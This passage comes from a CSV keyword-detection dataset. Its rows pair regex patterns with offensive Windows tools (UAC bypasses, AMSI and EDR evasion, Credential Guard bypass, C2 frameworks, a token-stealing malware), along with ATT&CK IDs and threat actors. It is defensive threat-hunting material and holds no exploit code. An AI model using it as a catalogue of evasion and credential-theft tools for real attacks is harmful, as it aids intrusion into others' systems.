Evasion","https://github.com/antonioCoco/SspiUacBypass","1","0","N/A","N/A","10","5","433","56","2023-09-24T17:33:25Z","2023-09-14T20:59:22Z","36446" "*Bypass UAC using .NET *",".{0,1000}Bypass\sUAC\susing\s\.NET\s.{0,1000}","offensive_tool_keyword","WinPwnage","various exploitation tools for windows ","T1548.002 - T1546.016 - T1546.003 - T1547.001 - T1053.005 - T1053.003 - T1548 - T1055.011 - T1078","TA0004 - TA0005 - TA0009 - TA0003 - TA0011","N/A","N/A","Exploitation tool","https://github.com/rootm0s/WinPwnage","1","0","#content","N/A","10","10","2670","385","2023-02-13T09:43:13Z","2018-04-08T18:51:50Z","36447" "*Bypass UAC using cliconfg *",".{0,1000}Bypass\sUAC\susing\scliconfg\s.{0,1000}","offensive_tool_keyword","WinPwnage","various exploitation tools for windows 
","T1548.002 - T1546.016 - T1546.003 - T1547.001 - T1053.005 - T1053.003 - T1548 - T1055.011 - T1078","TA0004 - TA0005 - TA0009 - TA0003 - TA0011","N/A","N/A","Exploitation tool","https://github.com/rootm0s/WinPwnage","1","0","#content","N/A","10","10","2670","385","2023-02-13T09:43:13Z","2018-04-08T18:51:50Z","36448" "*Bypass UAC using cmstp *",".{0,1000}Bypass\sUAC\susing\scmstp\s.{0,1000}","offensive_tool_keyword","WinPwnage","various exploitation tools for windows ","T1548.002 - T1546.016 - T1546.003 - T1547.001 - T1053.005 - T1053.003 - T1548 - T1055.011 - T1078","TA0004 - TA0005 - TA0009 - TA0003 - TA0011","N/A","N/A","Exploitation tool","https://github.com/rootm0s/WinPwnage","1","0","#content","N/A","10","10","2670","385","2023-02-13T09:43:13Z","2018-04-08T18:51:50Z","36449" "*Bypass UAC using compmgmtlauncher *",".{0,1000}Bypass\sUAC\susing\scompmgmtlauncher\s.{0,1000}","offensive_tool_keyword","WinPwnage","various exploitation tools for windows ","T1548.002 - T1546.016 - T1546.003 - T1547.001 - T1053.005 - T1053.003 - T1548 - T1055.011 - T1078","TA0004 - TA0005 - TA0009 - TA0003 - TA0011","N/A","N/A","Exploitation tool","https://github.com/rootm0s/WinPwnage","1","0","#content","N/A","10","10","2670","385","2023-02-13T09:43:13Z","2018-04-08T18:51:50Z","36450" "*Bypass UAC using computerdefaults *",".{0,1000}Bypass\sUAC\susing\scomputerdefaults\s.{0,1000}","offensive_tool_keyword","WinPwnage","various exploitation tools for windows ","T1548.002 - T1546.016 - T1546.003 - T1547.001 - T1053.005 - T1053.003 - T1548 - T1055.011 - T1078","TA0004 - TA0005 - TA0009 - TA0003 - TA0011","N/A","N/A","Exploitation tool","https://github.com/rootm0s/WinPwnage","1","0","#content","N/A","10","10","2670","385","2023-02-13T09:43:13Z","2018-04-08T18:51:50Z","36451" "*Bypass UAC using eventviewer *",".{0,1000}Bypass\sUAC\susing\seventviewer\s.{0,1000}","offensive_tool_keyword","WinPwnage","various exploitation tools for windows ","T1548.002 - T1546.016 - T1546.003 - T1547.001 - 
T1053.005 - T1053.003 - T1548 - T1055.011 - T1078","TA0004 - TA0005 - TA0009 - TA0003 - TA0011","N/A","N/A","Exploitation tool","https://github.com/rootm0s/WinPwnage","1","0","#content","N/A","10","10","2670","385","2023-02-13T09:43:13Z","2018-04-08T18:51:50Z","36452" "*Bypass UAC using fodhelper *",".{0,1000}Bypass\sUAC\susing\sfodhelper\s.{0,1000}","offensive_tool_keyword","WinPwnage","various exploitation tools for windows ","T1548.002 - T1546.016 - T1546.003 - T1547.001 - T1053.005 - T1053.003 - T1548 - T1055.011 - T1078","TA0004 - TA0005 - TA0009 - TA0003 - TA0011","N/A","N/A","Exploitation tool","https://github.com/rootm0s/WinPwnage","1","0","#content","N/A","10","10","2670","385","2023-02-13T09:43:13Z","2018-04-08T18:51:50Z","36453" "*Bypass UAC using mcx2prov *",".{0,1000}Bypass\sUAC\susing\smcx2prov\s.{0,1000}","offensive_tool_keyword","WinPwnage","various exploitation tools for windows ","T1548.002 - T1546.016 - T1546.003 - T1547.001 - T1053.005 - T1053.003 - T1548 - T1055.011 - T1078","TA0004 - TA0005 - TA0009 - TA0003 - TA0011","N/A","N/A","Exploitation tool","https://github.com/rootm0s/WinPwnage","1","0","#content","N/A","10","10","2670","385","2023-02-13T09:43:13Z","2018-04-08T18:51:50Z","36454" "*Bypass UAC using migwiz *",".{0,1000}Bypass\sUAC\susing\smigwiz\s.{0,1000}","offensive_tool_keyword","WinPwnage","various exploitation tools for windows ","T1548.002 - T1546.016 - T1546.003 - T1547.001 - T1053.005 - T1053.003 - T1548 - T1055.011 - T1078","TA0004 - TA0005 - TA0009 - TA0003 - TA0011","N/A","N/A","Exploitation tool","https://github.com/rootm0s/WinPwnage","1","0","#content","N/A","10","10","2670","385","2023-02-13T09:43:13Z","2018-04-08T18:51:50Z","36455" "*Bypass UAC using mock *",".{0,1000}Bypass\sUAC\susing\smock\s.{0,1000}","offensive_tool_keyword","WinPwnage","various exploitation tools for windows ","T1548.002 - T1546.016 - T1546.003 - T1547.001 - T1053.005 - T1053.003 - T1548 - T1055.011 - T1078","TA0004 - TA0005 - TA0009 - TA0003 - 
TA0011","N/A","N/A","Exploitation tool","https://github.com/rootm0s/WinPwnage","1","0","#content","N/A","10","10","2670","385","2023-02-13T09:43:13Z","2018-04-08T18:51:50Z","36456" "*Bypass UAC using perfmon *",".{0,1000}Bypass\sUAC\susing\sperfmon\s.{0,1000}","offensive_tool_keyword","WinPwnage","various exploitation tools for windows ","T1548.002 - T1546.016 - T1546.003 - T1547.001 - T1053.005 - T1053.003 - T1548 - T1055.011 - T1078","TA0004 - TA0005 - TA0009 - TA0003 - TA0011","N/A","N/A","Exploitation tool","https://github.com/rootm0s/WinPwnage","1","0","#content","N/A","10","10","2670","385","2023-02-13T09:43:13Z","2018-04-08T18:51:50Z","36457" "*Bypass UAC using runas, *",".{0,1000}Bypass\sUAC\susing\srunas,\s.{0,1000}","offensive_tool_keyword","WinPwnage","various exploitation tools for windows ","T1548.002 - T1546.016 - T1546.003 - T1547.001 - T1053.005 - T1053.003 - T1548 - T1055.011 - T1078","TA0004 - TA0005 - TA0009 - TA0003 - TA0011","N/A","N/A","Exploitation tool","https://github.com/rootm0s/WinPwnage","1","0","#content","N/A","10","10","2670","385","2023-02-13T09:43:13Z","2018-04-08T18:51:50Z","36458" "*Bypass UAC using sdclt *",".{0,1000}Bypass\sUAC\susing\ssdclt\s.{0,1000}","offensive_tool_keyword","WinPwnage","various exploitation tools for windows ","T1548.002 - T1546.016 - T1546.003 - T1547.001 - T1053.005 - T1053.003 - T1548 - T1055.011 - T1078","TA0004 - TA0005 - TA0009 - TA0003 - TA0011","N/A","N/A","Exploitation tool","https://github.com/rootm0s/WinPwnage","1","0","#content","N/A","10","10","2670","385","2023-02-13T09:43:13Z","2018-04-08T18:51:50Z","36459" "*Bypass UAC using silentcleanup *",".{0,1000}Bypass\sUAC\susing\ssilentcleanup\s.{0,1000}","offensive_tool_keyword","WinPwnage","various exploitation tools for windows ","T1548.002 - T1546.016 - T1546.003 - T1547.001 - T1053.005 - T1053.003 - T1548 - T1055.011 - T1078","TA0004 - TA0005 - TA0009 - TA0003 - TA0011","N/A","N/A","Exploitation 
tool","https://github.com/rootm0s/WinPwnage","1","0","#content","N/A","10","10","2670","385","2023-02-13T09:43:13Z","2018-04-08T18:51:50Z","36460" "*Bypass UAC using slui *",".{0,1000}Bypass\sUAC\susing\sslui\s.{0,1000}","offensive_tool_keyword","WinPwnage","various exploitation tools for windows ","T1548.002 - T1546.016 - T1546.003 - T1547.001 - T1053.005 - T1053.003 - T1548 - T1055.011 - T1078","TA0004 - TA0005 - TA0009 - TA0003 - TA0011","N/A","N/A","Exploitation tool","https://github.com/rootm0s/WinPwnage","1","0","#content","N/A","10","10","2670","385","2023-02-13T09:43:13Z","2018-04-08T18:51:50Z","36461" "*Bypass UAC using sysprep *",".{0,1000}Bypass\sUAC\susing\ssysprep\s.{0,1000}","offensive_tool_keyword","WinPwnage","various exploitation tools for windows ","T1548.002 - T1546.016 - T1546.003 - T1547.001 - T1053.005 - T1053.003 - T1548 - T1055.011 - T1078","TA0004 - TA0005 - TA0009 - TA0003 - TA0011","N/A","N/A","Exploitation tool","https://github.com/rootm0s/WinPwnage","1","0","#content","N/A","10","10","2670","385","2023-02-13T09:43:13Z","2018-04-08T18:51:50Z","36462" "*Bypass UAC using token *",".{0,1000}Bypass\sUAC\susing\stoken\s.{0,1000}","offensive_tool_keyword","WinPwnage","various exploitation tools for windows ","T1548.002 - T1546.016 - T1546.003 - T1547.001 - T1053.005 - T1053.003 - T1548 - T1055.011 - T1078","TA0004 - TA0005 - TA0009 - TA0003 - TA0011","N/A","N/A","Exploitation tool","https://github.com/rootm0s/WinPwnage","1","0","#content","N/A","10","10","2670","385","2023-02-13T09:43:13Z","2018-04-08T18:51:50Z","36463" "*Bypass UAC using wsreset *",".{0,1000}Bypass\sUAC\susing\swsreset\s.{0,1000}","offensive_tool_keyword","WinPwnage","various exploitation tools for windows ","T1548.002 - T1546.016 - T1546.003 - T1547.001 - T1053.005 - T1053.003 - T1548 - T1055.011 - T1078","TA0004 - TA0005 - TA0009 - TA0003 - TA0011","N/A","N/A","Exploitation 
tool","https://github.com/rootm0s/WinPwnage","1","0","#content","N/A","10","10","2670","385","2023-02-13T09:43:13Z","2018-04-08T18:51:50Z","36464" "*bypass_cmdinject*",".{0,1000}bypass_cmdinject.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","36465" "*bypass_powershell_protections*",".{0,1000}bypass_powershell_protections.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. 
identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","36466" "*Bypass-4MSI*",".{0,1000}Bypass\-4MSI.{0,1000}","offensive_tool_keyword","evil-winrm","This shell is the ultimate WinRM shell for hacking/pentesting.WinRM (Windows Remote Management) is the Microsoft implementation of WS-Management Protocol. A standard SOAP based protocol that allows hardware and operating systems from different vendors to interoperate. Microsoft included it in their Operating Systems in order to make life easier to system administrators.This program can be used on any Microsoft Windows Servers with this feature enabled (usually at port 5985). of course only if you have credentials and permissions to use it. So we can say that it could be used in a post-exploitation hacking/pentesting phase. The purpose of this program is to provide nice and easy-to-use features for hacking. 
It can be used with legitimate purposes by system administrators as well but the most of its features are focused on hacking/pentesting stuff.","T1021.006 - T1059.001 - T1059.003 - T1047","TA0002 - TA0008","N/A","Turla","Exploitation tool","https://github.com/Hackplayers/evil-winrm","1","0","N/A","N/A","10","10","4804","626","2024-12-02T08:52:41Z","2019-05-28T10:53:00Z","36467" "*BypassAddUser.exe -*",".{0,1000}BypassAddUser\.exe\s\-.{0,1000}","offensive_tool_keyword","BypassAddUser","Bypass antivirus software to add users","T1562.001 - T1078.002 - T1136.001","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/TryA9ain/BypassAddUser","1","0","N/A","N/A","6","1","46","8","2020-12-12T05:11:35Z","2020-12-12T04:15:06Z","36468" "*bypass-amsi*",".{0,1000}bypass\-amsi.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0004 - TA0008 - TA0009 - TA0011 - TA0006 - TA0003 - TA0007 - TA0005 - TA0010","N/A","Black Basta - APT33 - HEXANE - Sandworm - Dispossessor","C2","https://github.com/nettitude/PoshC2","1","0","N/A","N/A","10","10","1908","340","2025-03-06T11:10:20Z","2018-07-23T08:53:32Z","36469" "*BypassAV.exe*",".{0,1000}BypassAV\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike plugin for quickly generating anti-kill executable files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - 
T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/hack2fun/BypassAV","1","1","N/A","N/A","10","10","908","125","2020-07-19T15:46:54Z","2020-02-17T02:33:14Z","36470" "*bypassBetterDiscord(*",".{0,1000}bypassBetterDiscord\(.{0,1000}","offensive_tool_keyword","Fentanyl","Stealer Malware - Steal Discord Tokens (+ Much More Info) - Steal Passwords/Cookies/History/Credit Cards/Phone Numbers and Addresses from all Browsers (Profile Support) - Steal PC Info - Steal Video Game Accounts (Adding more games + wallets and VPN's) - Low Detections - Anti VM - Sort of Fast - Startup - IP Logger","T1547.001 - T1552.001 - T1552.005 - T1110.001 - T1082 - T1562.001 - T1574.002 - T1529 - T1497.001 - T1543.003 - T1592.001","TA0005 - TA0006 - TA0040 - TA0003 - TA0009","N/A","N/A","Malware","https://github.com/dekrypted/Fentanyl","1","0","N/A","N/A","10","","N/A","","","","36471" 
"*bypass-classic.dll*",".{0,1000}bypass\-classic\.dll.{0,1000}","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","N/A","10","10","1668","270","2023-11-03T09:33:21Z","2021-08-02T15:35:57Z","36472" "*BypassCredGuard/zipball*",".{0,1000}BypassCredGuard\/zipball.{0,1000}","offensive_tool_keyword","BypassCredGuard","Credential Guard Bypass Via Patching Wdigest Memory","T1003 - T1112 - T1555.002 - T1574","TA0006 - TA0005 - TA0040","N/A","N/A","Credential Access","https://github.com/wh0amitz/BypassCredGuard","1","1","N/A","N/A","10","4","323","52","2023-02-03T06:55:43Z","2023-01-18T15:16:11Z","36473" "*BypassCredGuard-master*",".{0,1000}BypassCredGuard\-master.{0,1000}","offensive_tool_keyword","BypassCredGuard","Credential Guard Bypass Via Patching Wdigest Memory","T1003 - T1112 - T1555.002 - T1574","TA0006 - TA0005 - TA0040","N/A","N/A","Credential Access","https://github.com/wh0amitz/BypassCredGuard","1","1","N/A","N/A","10","4","323","52","2023-02-03T06:55:43Z","2023-01-18T15:16:11Z","36474" "*BYPASS-DINVOKE*.dll*",".{0,1000}BYPASS\-DINVOKE.{0,1000}\.dll.{0,1000}","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1027 - T1055 - T1070 - T1112 - T1140","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","N/A","10","10","1668","270","2023-11-03T09:33:21Z","2021-08-02T15:35:57Z","36475" "*BYPASS-DINVOKE.dll*",".{0,1000}BYPASS\-DINVOKE\.dll.{0,1000}","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","N/A","10","10","1668","270","2023-11-03T09:33:21Z","2021-08-02T15:35:57Z","36476" 
"*BYPASS-DINVOKE_MANUAL_MAPPING.dll*",".{0,1000}BYPASS\-DINVOKE_MANUAL_MAPPING\.dll.{0,1000}","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","N/A","10","10","1668","270","2023-11-03T09:33:21Z","2021-08-02T15:35:57Z","36477" "*bypass-pipe.c*",".{0,1000}bypass\-pipe\.c.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 
- APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://www.cobaltstrike.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","36478" "*bypass-powershell.ps1*",".{0,1000}bypass\-powershell\.ps1.{0,1000}","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","N/A","10","10","1668","270","2023-11-03T09:33:21Z","2021-08-02T15:35:57Z","36479" "*BypassUAC *.exe*",".{0,1000}BypassUAC\s.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","Tokenvator","A tool to elevate privilege with Windows Tokens","T1134 - T1078","TA0003 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/0xbadjuju/Tokenvator","1","0","N/A","N/A","N/A","10","1038","201","2023-10-06T13:17:05Z","2017-12-08T01:29:11Z","36480" "*bypassuac fodhelper*",".{0,1000}bypassuac\sfodhelper.{0,1000}","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","N/A","N/A","10","10","463","108","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z","36481" "*Bypass-UAC*",".{0,1000}Bypass\-UAC.{0,1000}","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Framework","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","N/A","10","1103","499","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z","36482" "*bypassUAC*.boo*",".{0,1000}bypassUAC.{0,1000}\.boo.{0,1000}","offensive_tool_keyword","silenttrinity","SILENTTRINITY is modern. asynchronous. 
multiplayer & multiserver C2/post-exploitation framework powered by Python 3 and .NETs DLR. Its the culmination of an extensive amount of research into using embedded third-party .NET scripting languages to dynamically call .NET APIs. a technique the author coined as BYOI (Bring Your Own Interpreter). The aim of this tool and the BYOI concept is to shift the paradigm back to PowerShell style like attacks (as it offers much more flexibility over traditional C# tradecraft) only without using PowerShell in anyway.","T1548.002 - T1134.001 - T1087.002 - T1010 - T1547.001 - T1059.001 - T1059.003 - T1059.006 - T1543.003 - T1555.003 - T1555.004 - T1546.001 - T1546.003 - T1546.015 - T1041 - T1083 - T1564.003 - T1562.001 - T1562.003 - T1070 - T1070.004 - T1105 - T1056.001 - T1056.002 - T1556 - T1112 - T1106 - T1046 - T1135 - T1003.001 - T1069.001 - T1069.002 - T1057 - T1055 - T1012 - T1021.003 - T1021.006 - T1018 - T1113 - T1518.001 - T1558.003 - T1082 - T1033 - T1007 - T1124 - T1552.006 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/byt3bl33d3r/SILENTTRINITY","1","1","N/A","N/A","N/A","10","2239","416","2023-12-06T17:17:24Z","2018-09-25T15:17:30Z","36483" "*bypassUAC*.py*",".{0,1000}bypassUAC.{0,1000}\.py.{0,1000}","offensive_tool_keyword","silenttrinity","SILENTTRINITY is modern. asynchronous. multiplayer & multiserver C2/post-exploitation framework powered by Python 3 and .NETs DLR. Its the culmination of an extensive amount of research into using embedded third-party .NET scripting languages to dynamically call .NET APIs. a technique the author coined as BYOI (Bring Your Own Interpreter). 
The aim of this tool and the BYOI concept is to shift the paradigm back to PowerShell style like attacks (as it offers much more flexibility over traditional C# tradecraft) only without using PowerShell in anyway.","T1548.002 - T1134.001 - T1087.002 - T1010 - T1547.001 - T1059.001 - T1059.003 - T1059.006 - T1543.003 - T1555.003 - T1555.004 - T1546.001 - T1546.003 - T1546.015 - T1041 - T1083 - T1564.003 - T1562.001 - T1562.003 - T1070 - T1070.004 - T1105 - T1056.001 - T1056.002 - T1556 - T1112 - T1106 - T1046 - T1135 - T1003.001 - T1069.001 - T1069.002 - T1057 - T1055 - T1012 - T1021.003 - T1021.006 - T1018 - T1113 - T1518.001 - T1558.003 - T1082 - T1033 - T1007 - T1124 - T1552.006 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/byt3bl33d3r/SILENTTRINITY","1","1","N/A","N/A","N/A","10","2239","416","2023-12-06T17:17:24Z","2018-09-25T15:17:30Z","36484" "*--bypass-uac*--logontype*",".{0,1000}\-\-bypass\-uac.{0,1000}\-\-logontype.{0,1000}","offensive_tool_keyword","RunasCs","RunasCs is an utility to run specific processes with different permissions than the user's current logon provides using explicit credential","T1055 - T1134.001","TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/antonioCoco/RunasCs","1","0","N/A","N/A","7","10","1159","141","2024-07-12T23:31:35Z","2019-08-08T20:18:18Z","36485" "*bypassuac_comhijack.rb*",".{0,1000}bypassuac_comhijack\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. 
identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","36486" "*bypassuac_compdefaults*",".{0,1000}bypassuac_compdefaults.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). 
with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1548.002 - T1071.001 - T1547.001 - T1115 - T1059.001 - T1059.003 - T1059.005 - T1005 - T1573.002 - T1083 - T1564.003 - T1105 - T1046 - T1135 - T1003.002 - T1003.003 - T1055.001 - T1021.001 - T1053.005 - T1218.005 - T1218.010 - T1218.011 - T1082 - T1016 - T1033 - T1569.002 - T1047","TA0004 - TA0011 - TA0003 - TA0008 - TA0002 - TA0009 - TA0010 - TA0005 - TA0006 - TA0007","N/A","PYSA - BlackCat - Black Basta - LockBit - APT28 - LazyScripter - Sidewinder - MuddyWater - FANCY BEAR","C2","https://github.com/offsecginger/koadic","1","1","N/A","N/A","10","10","290","83","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z","36487" "*bypassuac_compmgmtlauncher*",".{0,1000}bypassuac_compmgmtlauncher.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). 
with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1548.002 - T1071.001 - T1547.001 - T1115 - T1059.001 - T1059.003 - T1059.005 - T1005 - T1573.002 - T1083 - T1564.003 - T1105 - T1046 - T1135 - T1003.002 - T1003.003 - T1055.001 - T1021.001 - T1053.005 - T1218.005 - T1218.010 - T1218.011 - T1082 - T1016 - T1033 - T1569.002 - T1047","TA0004 - TA0011 - TA0003 - TA0008 - TA0002 - TA0009 - TA0010 - TA0005 - TA0006 - TA0007","N/A","PYSA - BlackCat - Black Basta - LockBit - APT28 - LazyScripter - Sidewinder - MuddyWater - FANCY BEAR","C2","https://github.com/offsecginger/koadic","1","1","N/A","N/A","10","10","290","83","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z","36488" "*bypassuac_eventvwr*",".{0,1000}bypassuac_eventvwr.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). 
